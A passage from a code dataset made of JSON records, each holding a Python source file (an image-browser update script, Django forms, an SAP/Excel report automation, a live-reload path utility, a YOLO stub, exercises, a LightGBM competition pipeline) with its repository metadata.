print(\"Files are not duplicates. Not sure what to do\")\n choice = ask(\"(k)eep all (q)uit? \", {\"k\", \"q\"})\n if choice == \"q\":\n print(\"Quitting\")\n sys.exit(0)\n if choice == \"k\":\n print(\"Skipping\")\n return\n\n# -----------------------------------------------\n# Update actions\n\ndef duplicate_check():\n all_data = store.get_db_data(deleted=False, reverse=True)\n\n grouped_data = defaultdict(list)\n\n for row in all_data:\n key = (row.exif['FileSize'],\n row.hash_sha256)\n grouped_data[key].append(row)\n\n for key, matches in grouped_data.items():\n if len(matches) == 1:\n continue\n \n process_possible_duplicates(matches)\n\ndef update_thumbnails(fnames):\n def get_data(fnames):\n if fnames:\n for fname in fnames:\n yield store.get_db_data_fname(fname)\n else:\n all_data = store.get_db_data(deleted=False)\n for item in all_data:\n yield item\n\n with store.batch():\n for entry in get_data(fnames):\n old_thumbnail_path = entry.thumbnail\n thumbnail_path = MetadataModule.Store.thumbnail(Config.upload_path(entry.fname), entry.fname)\n if old_thumbnail_path != thumbnail_path and old_thumbnail_path:\n delete_path(old_thumbnail_path)\n store.metadata.update({\"thumbnail\": thumbnail_path}, {\"fname\": entry.fname})\n\n# -----------------------------------\n# Map data to this new Metadata\n# format\nclass Metadata(Table):\n fields = [\n Txt(\"fname\"),\n Txt(\"hash_sha256\"),\n Timestamp(\"time_db_added\"),\n Timestamp(\"time_db_updated\"),\n Bool(\"deleted\"),\n Txt(\"desc\"),\n Json(\"exif\"), # exiftool -json data\n Txt(\"mime_type\"),\n Timestamp(\"file_ts\"), # timestamp for the file\n Txt(\"thumbnail\"),\n Json(\"tags\"),\n ]\n\ndef translate_row(old_row):\n \"\"\"Translate a row of data from the old format\n MetadataModule.Metadata to Metadata table defined\n in this file\"\"\"\n file_ts = from_exif_timestamp(old_row.exif.get('DateTimeOriginal'),\n old_row.exif.get('CreateDate'),\n old_row.exif.get('TrackCreateDate'),\n old_row.exif.get('SubSecCreateDate'),\n old_row.exif.get('FileModifyDate'),\n )#old_row.exif_img_create_date)\n new_row = list(old_row)[:-3] + [file_ts] + list(old_row)[-2:]\n return new_row\n\ndef map_data(new_file):\n assert not os.path.exists(new_file), \"New file must not exist\"\n\n old_file = Config.metadata_file\n old_conn = sqlite3.connect(old_file)\n old_cursor = old_conn.cursor()\n old_table = MetadataModule.Metadata(old_cursor)\n old_data = old_table.get('*')\n old_cursor.close()\n old_conn.close()\n\n new_conn = sqlite3.connect(new_file)\n new_cursor = new_conn.cursor()\n new_table = Metadata(new_cursor)\n\n new_columns = new_table.columns()\n for idx, old_row in enumerate(old_data):\n new_row = translate_row(old_row)\n new_table.insert(**dict(zip(new_columns, new_row)))\n\n new_conn.commit()\n print(\"Copied {} rows\".format(idx))\n\ndef main(args):\n if args.map_data:\n assert not args.paths, \"Can't specify upload file paths with --map-data\"\n map_data(args.map_data)\n return\n\n if args.duplicate_check:\n assert not args.paths\n duplicate_check()\n return\n\n if args.update_thumbnails:\n fnames = [os.path.split(path)[1] for path in args.paths]\n update_thumbnails(fnames)\n return\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-d\", \"--duplicate-check\",\n action=\"store_true\")\n parser.add_argument(\"-t\", \"--update-thumbnails\",\n action=\"store_true\")\n parser.add_argument(\"--map-data\", metavar=\"NEW_SQLITE3_FILE\")\n parser.add_argument(\"paths\", nargs=\"*\")\n args = parser.parse_args()\n main(args)\n","repo_name":"sbirmi/file-browser","sub_path":"src/UpdateScript.py","file_name":"UpdateScript.py","file_ext":"py","file_size_in_byte":6113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70404780995","text":"#forms.py for tour app\n#forms.py\nfrom django import forms\nfrom django.contrib.auth.models import User\nfrom .models import tour_user, Tour, stops #relative import\n\n\nclass UserForm(forms.ModelForm):\n # username = forms.CharField(help_text=\"Please enter a username.\")\n # email = forms.CharField(help_text=\"Please enter your email.\")\n # password = forms.CharField(widget=forms.PasswordInput(), help_text=\"Please enter a password.\")\n\n class Meta:\n model = User\n fields = ['first_name', 'last_name', 'email']\n\nclass tour_user_Form(forms.ModelForm):\n class Meta:\n model = tour_user\n fields = [\n \"User_Gender\",\n \"about_you\",\n \"phone_number\",\n \"profile_picture\",\n \"languages\",\n \"work\",\n \"hometown\",\n \"alma_meter\",\n \"hobbies\",\n ]\n \n\n\nclass Tour_Form(forms.ModelForm):\n class Meta:\n model = Tour\n fields = [\n \"title\",\n \"country\",\n \"state\",\n \"cityname\",\n \"tour_theme\",\n \"capacity\",\n #\"duration\",\n \"tour_intensity\",\n \"image\",\n \"content\",\n \"description\",\n \"draft\",\n ]\n\nclass Stop_Form(forms.ModelForm):\n class Meta:\n model = stops\n fields = [\n \"image\",\n \"content\",\n ]\n\n\n","repo_name":"hannahmshin/Venture_Web","sub_path":"src/src/tour/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"6621471562","text":"import win32com.client as win\nimport pandas as pd\nfrom datetime import datetime\nimport subprocess,pyautogui\nimport time,os\nimport xlwings as xl\nos.system(\"TASKKILL /F /IM saplogon.exe\")\nos.system(\"TASKKILL /F /IM excel.exe\")\ntime.sleep(3)\nsubprocess.Popen([r\"C:\\Program Files (x86)\\SAP\\FrontEnd\\SAPgui\\saplogon.exe\"],shell=True)\ntime.sleep(5)\ngui=win.GetObject('SAPGUI')\ntoday=datetime.today().strftime('%m.%d.%y')\noor_file=\"OOR \"+today+\".XLSX\"\napplication=gui.GetScriptingEngine\npyautogui.press('down')\npyautogui.press('down')\npyautogui.press('enter')\ntime.sleep(5)\npyautogui.press('enter')\ntime.sleep(2)\npyautogui.typewrite('ZQ2COPENSO\\n')\nfor i in range(8):\n pyautogui.typewrite('down')\npyautogui.typewrite('3321')\npyautogui.press('tab')\npyautogui.typewrite('3322')\nfor i in range(3):\n pyautogui.press('tab')\npyautogui.press('down')\npyautogui.press('tab')\npyautogui.press('enter')\ntime.sleep(120)\n\n\nsubprocess.call(['cscript.exe',r\"C:\\Users\\ajarabani\\Downloads\\PYTHON\\SAP OOR.vbs\"])\nmtime=os.path.getmtime(r\"C:\\Users\\ajarabani\\Downloads\\OOR.XLSX\")\nwhile True:\n if time.time()-mtime<60:\n break\n time.sleep(1)\nwb=xl.Book(r\"C:\\Users\\ajarabani\\Downloads\\OOR.XLSX\")\nws=wb.sheets.active\ndata_range=ws.used_range\ndf=pd.DataFrame(data_range.value)\ndf.columns=df.iloc[0]\ndf=df[1:]\ndf=df[['Order Type','Shipping plant','Ship-to name','Sale Order number','Material','Material Description','First date','Delv Schedule line date','Schedule Line Quantity','Unit price','Open SO quantity','Sold to name','Ship-to Country','Current Cust Need By date','Rejection reason code']]\ndf=df.loc[~df['Order Type'].str.contains('ZKB|ZLBO|ZRO')]\ndf=df.loc[df['Rejection reason code'].isna()]\ndf=df.loc[df['Open SO quantity']!=0]\ntry:\n df['Open SO quantity']=df['Open SO quantity'].astype(float)\nexcept:\n df['Open SO quantity']=df['Open SO quantity']+','\n df['Open SO quantity']=df['Open SO quantity'].str.replace(',','')\n df['Open SO quantity']=df['Open SO quantity'].astype(float)\ndf['Delv Schedule line date']=pd.to_datetime(df['Delv Schedule line date'], format='%Y-%m-%d %H:%M:%S').dt.strftime('%m/%d/%Y')\ndf.to_pickle('OOR.PKL')\nprint('OOR.PKL COMPLETE')\nos.system(\"TASKKILL /F /IM saplogon.exe\")\nos.system(\"TASKKILL /F /IM excel.exe\")","repo_name":"AnveshJarabani/END-END-ETL-PIPELINES","sub_path":"PY_REPO/SAP_OOR_PULL.py","file_name":"SAP_OOR_PULL.py","file_ext":"py","file_size_in_byte":2247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25853354870","text":"from __future__ import annotations\nfrom functools import cached_property\n\nimport os\nfrom pathlib import Path\nimport platform\nfrom typing import Literal\nimport string\n\nLOCALHOST: tuple[Literal['127.0.0.1', 'localhost']] = (\"127.0.0.1\", \"localhost\")\nSERVER_PORT = 3031\nPORT_RANGE = [49200, 65535]\n\nPLATFORM = platform.system()\n\nlivereload_script = string.Template(\n \"\"\"\n\n\"\"\"\n)\n\ndef path_exists_case_sensitive(p: str|Path) -> bool:\n \"\"\"Check if path exists, enforce case sensitivity.\n\n Arguments:\n p: Path to check\n Returns:\n Boolean indicating if the path exists or not\n \"\"\"\n p = Path(p)\n # If it doesn't exist initially, return False\n if not p.exists():\n return False\n\n # Else loop over the path, checking each consecutive folder for\n # case sensitivity\n while True:\n # At root, p == p.parent --> break loop and return True\n if p == p.parent:\n return True\n # If string representation of path is not in parent directory, return False\n if str(p) not in map(str, p.parent.iterdir()):\n return False\n p = p.parent\n\n\ndef default(root: str, src: str) -> list[str]:\n if src.endswith((\".css\", \".js\")):\n return [translate_path(root, src), \"**\"]\n return [translate_path(root, src)]\n\ndef translate_path(root, src) -> str:\n path = ServerPath(src).lstrip().lstrip(root)\n \n if len(path.parents) == 0:\n return \"/\"\n if path.isfile():\n path = path.parent.normpath()\n return path.posix() + \"/\"\n path = path.normpath()\n return path.posix() + \"/\"\n\nclass ServerPath:\n \"\"\"Path object for the live reload server. Keeps the seperators as `/` and does a lot of extra\n work for normalizing the path. It also has a case sensitive check for if the path exists. This\n is needed for windows systems.\n \"\"\"\n\n def __init__(self, *paths: str) -> None:\n flat = []\n for p in paths:\n if isinstance(p, (list, set, tuple)):\n flat.extend(p)\n else:\n flat.append(p)\n\n self.path = \"/\".join(str(p) for p in flat if p != \"\").replace(\"\\\\\", \"/\").replace(\"//\", \"/\")\n if len(self.path) > 2:\n self.path = self.path.replace(\"./\", \"\")\n\n @property\n def parent(self) -> ServerPath:\n \"\"\"Return a new ServerPath instance that represents the parent directory.\"\"\"\n parts = self.path.rsplit(\"/\", 1)\n if len(parts) > 1:\n if parts[0] != \"\":\n return ServerPath(parts[0], \"/\")\n return ServerPath(parts[0])\n else:\n return ServerPath(\"\")\n\n @property\n def parents(self) -> list[str]:\n \"\"\"Return a list of all the parent directories.\"\"\"\n return self.path.split(\"/\")[:-1]\n\n @cached_property\n def name(self) -> str:\n \"\"\"Name of the file/directory path. This is the last named segement of the path.\"\"\"\n return self.path.rsplit(\"/\", 1)[-1].split(\".\", 1)[0]\n\n @cached_property\n def suffix(self) -> str:\n \"\"\"Suffix of the file path. None if no file extension is found.\"\"\"\n parts = self.path.rsplit(\"/\", 1)[-1].split(\".\", 1)\n if len(parts) > 1:\n return f\".{parts[-1]}\"\n else:\n return None\n\n def with_suffix(self, suffix: str = \"\"):\n \"\"\"Replace the file paths suffix. Either an extension or blank for removing the extension.\n \"\"\"\n suffix = f\".{suffix}\" if not suffix.startswith(\".\") and suffix != \"\" else suffix\n parts = self.path.rsplit(\"/\", 1)\n if len(parts) > 1:\n self.path = parts[0] + \"/\" + self.name.split(\".\", 1)[0] + suffix\n else:\n self.path = parts[0].split(\".\", 1)[0] + suffix\n return self\n\n def with_name(self, name: str):\n \"\"\"Replace the paths name. Either the file path name or the directory name.\"\"\"\n trail = \"/\" if self.path.endswith(\"/\") else \"\"\n parts = self.path.rstrip(\"/\").rsplit(\"/\", 1)\n\n suffix_parts = parts[-1].split(\".\", 1)\n suffix = f\".{suffix_parts[-1]}\" if len(suffix_parts) > 1 else \"\"\n\n if len(parts) > 1:\n self.path = parts[0] + \"/\" + name + suffix + trail\n else:\n self.path = name + suffix + trail\n return self\n\n def relative_to(self, rel_path: str) -> ServerPath:\n \"\"\"Calculate the path to the relative path assuming that the current paths root is the\n current directory.\n \"\"\"\n parents = self.parents\n\n rel_path = rel_path.replace(\"\\\\\", \"/\").replace(\"//\", \"/\").split(\"/\")\n parent_pos = len(parents)\n for i, part in enumerate(rel_path):\n if part == \"..\":\n parent_pos -= 1\n if parent_pos < 0:\n raise IndexError(f\"Can't have a relative path that is outside the outer most\\\nscope of the current path {self.posix()!r}\")\n else:\n return ServerPath(*parents[:parent_pos], *rel_path[i:])\n return ServerPath(*parents[:parent_pos])\n\n def regex(self) -> str:\n \"\"\"Replace ** with .* and * with [^/]* in the path.\"\"\"\n parts = []\n for part in self.path.split(\"/\"):\n if part == \"**\":\n parts.append(\".*\")\n else:\n parts.append(part.replace(\"*\", \"[^/]*\"))\n return \"/\".join(parts)\n \n def strip(self, text: str = \"/\"):\n \"\"\"Remove a substring from the start and end of the path.\"\"\"\n self.path = self.path.strip(text)\n return self\n\n def rstrip(self, end: str = \"/\"):\n \"\"\"Remove a substring from the end of the path.\"\"\"\n self.path = self.path.rstrip(end)\n return self\n\n def lstrip(self, start: str = \"/\"):\n \"\"\"Remove a substring from the start of the path.\"\"\"\n self.path = self.path.lstrip(start)\n return self\n\n def normpath(self):\n \"\"\"Remove leading and trailing `/` and replace all double slashes with single slashes.\"\"\"\n self.path = self.path.strip(\"/\").replace(\"//\", \"/\")\n return self\n\n def join(self, *paths) -> ServerPath:\n \"\"\"Return a new ServerPath instance with the current path joined with the passed in paths.\n \"\"\"\n return ServerPath(self.path, *paths)\n\n def exists(self) -> bool:\n \"\"\"Check if the path exists. Either file or directory.\"\"\"\n return path_exists_case_sensitive(self.path)\n\n def isdir(self) -> bool:\n \"\"\"Check if the path is a directory. Ignores if it exists.\"\"\"\n return os.path.isdir(self.path) and self.exists()\n\n def isfile(self) -> bool:\n \"\"\"Check if the path is a file. Ignores if it exists.\"\"\"\n return os.path.isfile(self.path) and self.exists()\n\n def posix(self) -> str:\n \"\"\"Get the string representation of the path.\"\"\"\n return self.path if self.path != \"\" else \".\"\n\n def win(self) -> str:\n \"\"\"Get the windows representation of the path.\"\"\"\n return self.path.replace(\"/\", \"\\\\\") if self.path != \"\" else \".\"\n\n def platform(self) -> str:\n \"\"\"Returns the stringified version of the path with the seperators that match the current\n operating system.\n \"\"\"\n if PLATFORM == \"Windows\":\n return self.win()\n return self.posix()\n\n def __repr__(self) -> str:\n return f\"ServerPath({self.path!r})\"\n\n def __str__(self) -> str:\n return self.path\n\nif __name__ == \"__main__\":\n print(ServerPath(\"*/**/rainbow\").regex())\n print(Path(\"Server.py\").exists())\n","repo_name":"Tired-Fox/watchserver","sub_path":"watchserver/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":8477,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"3986659604","text":"#!/usr/bin/env python3\n\n\"\"\"\nClass Yolo that uses Yolo v3\nalgorithm to perform object\ndetection\nThis class aims to create a base\nstructure that will serve as the\nfoundation for the following tasks.\n\"\"\"\n\nimport tensorflow.keras as K\nimport numpy as np\n\n\nclass Yolo:\n \"\"\"\n Yolo class uses algorithm Yolo v3 to complete\n object detection in images and videos.\n Objects are classified within a frame.\n The purpose of this class is to allow for user-friendly\n usage of YOLOv3 by encapsulating model loading,\n class info, and parameter config.\n \"\"\"\n\n def __init__(self, model_path, classes_path, class_t, nms_t, anchors):\n \"\"\"Adding expected parameters\n Args:\n model_path: path to pretained Yolo model\n classes_path: list of class names\n class_t: box score threshold for filtering\n nnms_t: IOU threshold for non max suppression\n anchors: anchor for box info\n \"\"\"\n self.model = K.models.load_model(model_path)\n with open(classes_path) as file:\n class_names = file.read()\n self.class_names = class_names.replace(\"\\n\", \"|\").split(\"|\")[:-1]\n self.class_t = class_t\n self.nms_t = nms_t\n self.anchors = anchors\n","repo_name":"jobabyyy/holbertonschool-machine_learning","sub_path":"supervised_learning/object_detection/0-yolo.py","file_name":"0-yolo.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23554284561","text":"infile = open(\"B-large.in\", \"r\")\r\nlines = infile.readlines()\r\noutfile = open(\"out.out\", \"w\")\r\ntc = int(lines[0])\r\n\r\n\r\nfor t in range(tc):\r\n\tn = lines[t+1].strip()\t\r\n\ti = len(n) - 1\r\n\r\n\twhile(i >= 1):\r\n\t\tif n[i] < n[i-1]:\t\r\n\t\t\tnines = \"\"\r\n\t\t\tfor x in range(i+1, len(n)):\r\n\t\t\t\tnines = nines + \"9\"\t\t\r\n\t\t\tn = n[0:i-1] + str(int(n[i-1]) - 1) + \"9\" + nines\r\n\t\ti -= 1\r\n\r\n\toutfile.write(\"Case #\" + str(t+1) + \": \" + str(n.lstrip('0')) + \"\\n\")\r\n\t\t\t","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_200/1998.py","file_name":"1998.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4632862093","text":"'''\nLayout file for Benford's law validator webapp\n'''\n\nimport dash_bootstrap_components as dbc\nimport dash_core_components as dcc\nimport dash_html_components as html\n\n# Layout for new data card\nnewFile = dbc.Card(\n [\n dbc.FormGroup(\n [\n dbc.Label(\"Load New File\"),\n dcc.Upload(\n id=\"upload-data\",\n children=html.Div([\"Drag and Drop or \", html.A(\"Select File\")]),\n style={\n \"width\": \"100%\",\n \"height\": \"40px\",\n \"lineHeight\": \"40px\",\n \"borderWidth\": \"1px\",\n \"borderStyle\": \"dashed\",\n \"borderRadius\": \"5px\",\n \"textAlign\": \"center\",\n # \"margin\": \"10px\",\n },\n multiple=False,\n ),\n html.Div(id=\"output-data-upload\"),\n dcc.Dropdown(\n id=\"selectcolumn-dropdown\",\n placeholder=\"Select column\",\n ),\n ],\n ),\n ],\n body=True,\n)\n\n# Layout for historical data card\noldData = dbc.Card(\n [\n dbc.FormGroup(\n [\n dbc.Label(\"Or Select Historical Dataset\"),\n dcc.Dropdown(\n id=\"history-dropdown\",\n options=[],\n placeholder=\"Select historical dataset\",\n ),\n ],\n ),\n ],\n body=True,\n)\n\n# Layout for new data tab\nnew_data_tab = (\n newFile,\n html.Div(id=\"output-data-results-new\"),\n)\n\n# Layout for historical data tab\nhistorical_data_tab = (\n oldData,\n html.Div(id=\"output-data-results-historical\"),\n)\n\n# Main layout\nmainLayout = dbc.Container(\n children=[\n html.H1(children=\"Benford's Law Validator\"),\n html.Hr(),\n dbc.Tabs(\n [\n dbc.Tab(new_data_tab, label=\"New Data\"),\n dbc.Tab(historical_data_tab, label=\"Historical Data\"),\n ]\n ),\n dcc.Store(id=\"memory-output\"),\n ],\n fluid=True,\n className=\"p-5\",\n)","repo_name":"kctlau/benford","sub_path":"layout.py","file_name":"layout.py","file_ext":"py","file_size_in_byte":2186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4381597393","text":"#coding=UTF-8\ng =filter(lambda x:x % 2 ==0,list(range(1,101)))\nprint(list(g))\n\n'''\n用位置匹配参数,关键字匹配参数,收集匹配参数分别写四个函数\n'''\ndef func1(arg1,arg2,arg3):\n\tresult = [arg1,arg2,arg3]\n\treturn result\n\t\ndef func2(arg1 = 'a',arg2 = 'b',arg3 = 'c'):\n\treturn [arg1,arg2,arg3]\ndef func3(*kargs):\n\t'该方法返回输入的任意个列表中所有元素的最大值'\n\tkargs=list(kargs)\n\tfor i in range(1,len(kargs)):\n\t\tkargs[0].extend(kargs[i])\t\n\treturn max(kargs[0])\ndef func4(**kwargs):\n\treturn kwargs\n\t\n\n\ndef func5(i):\n\tif i<100:\n\t\treturn i + func5(i+1)\n\treturn i\nprint (func5(0))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nif __name__ == '__main__':\n\tassert func1(1,2,3) == [1,2,3]\n\tassert func2(arg2 =1,arg1 =2,arg3 =3) == [2,1,3]\n\tassert func4(apple ='fruit',cabbage ='vegetable')=={'apple':'fruit','cabbage':'vegetable'}\n\tassert func3([1,2,3],[1,5,65],[33,445,22])== 445\n\t'''\n\t要注意keywords不能为表达式,如:\n\t这里前面函数参数那块不能加引号,而输出的字典结果会自动加上引号。\n\t'''\n\t","repo_name":"winynfuck/PYdemo","sub_path":"python基础代码/老鱼python习题代码/进阶习题四.py","file_name":"进阶习题四.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26612782285","text":"# -*- coding: utf-8 -*-\r\n# Inspired by tianchi.aliyun.com/notebook-ai/detail?postId=44844\r\nimport warnings\r\nwarnings.filterwarnings('ignore')\r\nimport time\r\nimport re\r\nimport numpy as np\r\nimport pandas as pd\r\nimport lightgbm as lgb\r\nfrom tqdm import tqdm\r\nfrom sklearn.model_selection import KFold, RepeatedKFold\r\nfrom sklearn.metrics import mean_squared_error\r\n\r\n# Load Dataset\r\nt0 = time.time()\r\ntrain = pd.read_csv('./data/jinnan_round1_train_20181227.csv', encoding='gb18030')\r\ntest = pd.read_csv('./data/jinnan_round1_testB_20190121.csv', encoding='gb18030')\r\nprint(f'Data Loaded in {(time.time()-t0):.1f} s !')\r\nprint('------------------------------------')\r\n\r\n# Processing Anomalies and Combining Dataset\r\nt0 = time.time()\r\ntrain = train[train['收率'] > 0.87]\r\ntrain.loc[train['B14'] == 40, 'B14'] = 400\r\ntrain = train[train['B14']>=400]\r\ntrain.loc[train['A25'] == '1900/3/10 0:00', 'A25'] = train['A25'].value_counts().values[0]\r\ntrain['A25'] = train['A25'].astype(int)\r\ntarget = train.pop('收率')\r\ntest_id = test['样本id']\r\ndata = pd.concat([train, test], axis=0, ignore_index=True)\r\ndata = data.fillna(-1)\r\ndata['样本id'] = data['样本id'].apply(lambda x: x.split('_')[1])\r\ndata['样本id'] = data['样本id'].astype(int)\r\nprint(f'Anomalies Processed in {(time.time()-t0):.1f} s !')\r\nprint('------------------------------------')\r\n\r\n# Processing Special Case\r\nprint('Special Value(B14) Processing...')\r\ntest_select = {}\r\nfor v in [280, 360, 385, 390, 785]:\r\n\tprint(v)\r\n\tprint(test[test['B14'] == v]['样本id'])\r\n\ttest_select[v] = test[test['B14'] == v]['样本id'].index\r\nprint('Special Value(B14) Processed!')\r\nprint('------------------------------------')\r\n\r\n# Processing TimeData\r\nt0 = time.time()\r\ndef timeTranSecond(t):\r\n\ttry:\r\n\t\tt, m, s = t.split(\":\")\r\n\texcept:\r\n\t\tif t == '1900/1/9 7:00':\r\n\t\t\treturn 7 * 3600 / 3600\r\n\t\telif t == '1900/1/1 2:30':\r\n\t\t\treturn (2 * 3600 + 30 * 60) / 3600\r\n\t\telif t == -1:\r\n\t\t\treturn -1\r\n\t\telse:\r\n\t\t\treturn 0\r\n\ttry:\r\n\t\ttm = (int(t) * 3600 + int(m) * 60 + int(s)) / 3600\r\n\texcept:\r\n\t\treturn (30 * 60) / 3600\r\n\treturn tm\r\n\r\nfor f in ['A5', 'A7', 'A9', 'A11', 'A14', 'A16', 'A24', 'A26', 'B5', 'B7']:\r\n\ttry:\r\n\t\tdata[f] = data[f].apply(timeTranSecond)\r\n\texcept:\r\n\t\tprint(f, '应该在前面被删除了!')\r\n\r\ndef getDuration(se):\r\n\ttry:\r\n\t\tsh, sm, eh, em = re.findall(r\"\\d+\\.?\\d*\", se)\r\n\texcept:\r\n\t\tif se == -1:\r\n\t\t\treturn -1\r\n\ttry:\r\n\t\tif int(sh) > int(eh):\r\n\t\t\ttm = (int(eh) * 3600 + int(em) * 60 - int(sm) * 60 - int(sh) * 3600) / 3600 + 24\r\n\t\telse:\r\n\t\t\ttm = (int(eh) * 3600 + int(em) * 60 - int(sm) * 60 - int(sh) * 3600) / 3600\r\n\texcept:\r\n\t\tif se == '19:-20:05':\r\n\t\t\treturn 1\r\n\t\telif se == '15:00-1600':\r\n\t\t\treturn 1\r\n\treturn tm\r\n\r\nfor f in ['A20', 'A28', 'B4', 'B9', 'B10', 'B11']:\r\n\tdata[f] = data.apply(lambda df: getDuration(df[f]), axis=1)\r\nprint(f'Time Features Processed in {(time.time()-t0):.1f} s !')\r\nprint('------------------------------------')\r\n\r\n# Dataset Preparation for Differential\r\ntrain = data[:train.shape[0]]\r\ntest = data[train.shape[0]:]\r\ntrain['target'] = list(target)\r\nnew_train = train.copy()\r\nnew_train = new_train.sort_values(['样本id'], ascending=True)\r\ntrain_copy = train.copy()\r\ntrain_copy = train_copy.sort_values(['样本id'], ascending=True)\r\n# Train + Train = 2 x Train\r\ntrain_len = len(new_train)\r\nnew_train = pd.concat([new_train, train_copy])\r\n# Test + 2 x Train\r\ntest_len = len(test)\r\nnew_test = test.copy()\r\nnew_test = pd.concat([new_test, new_train])\r\n\r\n# Dataset Differential\r\n# New Trainset\r\ndiff_train = pd.DataFrame()\r\nids = list(train_copy['样本id'].values)\r\nfor i in tqdm(range(1, train_len)):\r\n\t# Interval of -1, -2, ... -len Rows\r\n\tdiff_tmp = new_train.diff(-i)\r\n\tdiff_tmp = diff_tmp[:train_len]\r\n\tdiff_tmp.columns = [col_ + '_difference' for col_ in diff_tmp.columns.values]\r\n\tdiff_tmp['样本id'] = ids\r\n\tdiff_train = pd.concat([diff_train, diff_tmp])\r\n# New Testset\r\ndiff_test = pd.DataFrame()\r\nids_test = list(test['样本id'].values)\r\nfor i in tqdm(range(test_len, test_len+train_len)):\r\n\t# Interval of -test_len , -test_len -1 ,.... -test_len - train_len +1 Rows\r\n\tdiff_tmp = new_test.diff(-i)\r\n\tdiff_tmp = diff_tmp[:test_len]\r\n\tdiff_tmp.columns = [col_ + '_difference' for col_ in diff_tmp.columns.values]\r\n\tdiff_tmp['样本id'] = ids_test\r\n\tdiff_test = pd.concat([diff_test, diff_tmp])\r\n\tdiff_test = diff_test[diff_train.columns]\r\n# Target\r\ntrain_target = train['target']\r\ntrain.drop(['target'], axis=1, inplace=True)\r\n# Combine Original Dataset and Differential Dataset\r\ndiff_train = pd.merge(diff_train, train, how='left', on='样本id')\r\ndiff_test = pd.merge(diff_test, test, how='left', on='样本id')\r\ntarget = diff_train['target_difference']\r\ndiff_train.drop(['target_difference'], axis=1, inplace=True)\r\ndiff_test.drop(['target_difference'], axis=1, inplace=True)\r\n\r\n# Model Run\r\nX_train = diff_train\r\ny_train = target\r\nX_test = diff_test\r\nparam = {'num_leaves': 31,\r\n\t\t 'min_data_in_leaf': 20,\r\n\t\t 'objective': 'regression',\r\n\t\t 'max_depth': -1,\r\n\t\t 'learning_rate': 0.01,\r\n\t\t \"boosting\": \"gbdt\",\r\n\t\t \"feature_fraction\": 0.9,\r\n\t\t \"bagging_freq\": 1,\r\n\t\t \"bagging_fraction\": 0.9,\r\n\t\t \"bagging_seed\": 11,\r\n\t\t \"metric\": 'mse',\r\n\t\t \"num_threads\": 8,\r\n\t\t \"verbosity\": -1}\r\nfolds = KFold(n_splits=5, shuffle=True, random_state=2018)\r\noof_lgb = np.zeros(len(diff_train))\r\npredictions_lgb = np.zeros(len(diff_test))\r\nfor fold_, (trn_idx, val_idx) in enumerate(folds.split(X_train, y_train)):\r\n\tprint(\"fold n°{}\".format(fold_ + 1))\r\n\tdev = X_train.iloc[trn_idx]\r\n\tval = X_train.iloc[val_idx]\r\n\ttrn_data = lgb.Dataset(dev, y_train.iloc[trn_idx])\r\n\tval_data = lgb.Dataset(val, y_train.iloc[val_idx])\r\n\tnum_round = 3000\r\n\tclf = lgb.train(param, trn_data, num_round, valid_sets=[trn_data, val_data], verbose_eval=100, early_stopping_rounds=100)\r\n\toof_lgb[val_idx] = clf.predict(val, num_iteration=clf.best_iteration)\r\n\tpredictions_lgb += clf.predict(X_test, num_iteration=clf.best_iteration) / folds.n_splits\r\n\r\n# Get Original Train Target\r\ndiff_train['compare_id'] = diff_train['样本id'] - diff_train['样本id_difference']\r\ntrain['compare_id'] = train['样本id']\r\ntrain['compare_target'] = list(train_target)\r\ndiff_train = pd.merge(diff_train, train[['compare_id', 'compare_target']], how='left', on='compare_id')\r\ndiff_train['pre_target_diff'] = oof_lgb\r\ndiff_train['pre_target'] = diff_train['pre_target_diff'] + diff_train['compare_target']\r\n# \r\nmean_result = diff_train.groupby('样本id')['pre_target'].mean().reset_index(name='pre_target_mean')\r\ntrue_result = train[['样本id', 'compare_target']]\r\nmean_result = pd.merge(mean_result, true_result, how='left', on='样本id')\r\nprint(\"CV score: {:<8.8f}\".format(mean_squared_error(oof_lgb, target)))\r\nprint(\"CV score: {:<8.8f}\".format(mean_squared_error(mean_result['pre_target_mean'].values, mean_result['compare_target'].values)))\r\n\r\n# Get Test Target\r\ndiff_test['compare_id'] = diff_test['样本id'] - diff_test['样本id_difference']\r\ndiff_test = pd.merge(diff_test, train[['compare_id', 'compare_target']], how='left', on='compare_id')\r\ndiff_test['pre_target_diff'] = predictions_lgb\r\ndiff_test['pre_target'] = diff_test['pre_target_diff'] + diff_test['compare_target']\r\n#\r\nmean_result_test = diff_test.groupby(diff_test['样本id'], sort=False)['pre_target'].mean().reset_index(name='pre_target_mean')\r\ntest = pd.merge(test, mean_result_test, how='left', on='样本id')\r\n\r\n# Submission\r\nsub_df = pd.DataFrame()\r\nsub_df[0] = test_id\r\nsub_df[1] = test['pre_target_mean']\r\nsub_df[1] = sub_df[1].apply(lambda x: round(x, 5))\r\n# Processing Special Case\r\nfor v in test_select.keys():\r\n\tif v == 280:\r\n\t\tx = 0.947\r\n\telif v == 360:\r\n\t\tx = 0.925\r\n\telif v == 385 or v == 785:\r\n\t\tx = 0.879\r\n\telif v == 390:\r\n\t\tx = 0.89\r\n\tprint(v)\r\n\tprint(test_select[v])\r\n\tsub_df.loc[test_select[v], 1] = x\r\nsub_df.to_csv('submit_B.csv', index=False, header=False)\r\nprint('Submit 